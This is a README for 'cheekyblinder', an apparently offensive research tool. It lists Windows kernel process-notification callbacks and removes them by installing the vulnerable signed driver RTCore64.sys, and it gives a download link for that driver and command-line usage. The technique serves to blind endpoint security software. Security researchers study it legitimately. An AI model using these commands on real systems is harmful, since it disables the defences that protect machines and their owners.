Enumerating and removing kernel callbacks using signed vulnerable drivers
Accompanying blog post: https://br-sn.github.io/Removing-Kernel-Callbacks-Using-Signed-Drivers/
WARNING: running this program might cause BSODs, run at your own risk.
Vulnerable driver can be downloaded from http://download-eu2.guru3d.com/afterburner/%5BGuru3D.com%5D-MSIAfterburnerSetup462Beta2.zip
Lots of code re-used from:
Should build fine on VS2019, build for x64 only.
Run elevated. Arguments and examples:
cheekyblinder.exe /process: lists the current process notification callbacks present on the system
cheekyblinder.exe /delprocess <address>: removes the callback at <address> (use the address from the output of /process)
cheekyblinder.exe /installDriver: installs the driver RTCore64.sys (place in same folder)
cheekyblinder.exe /uninstallDriver: removes the driver
I'll add more callbacks when I have time.
Use the mimikatz pattern search to find the array rather than hacky offsets. PRs welcome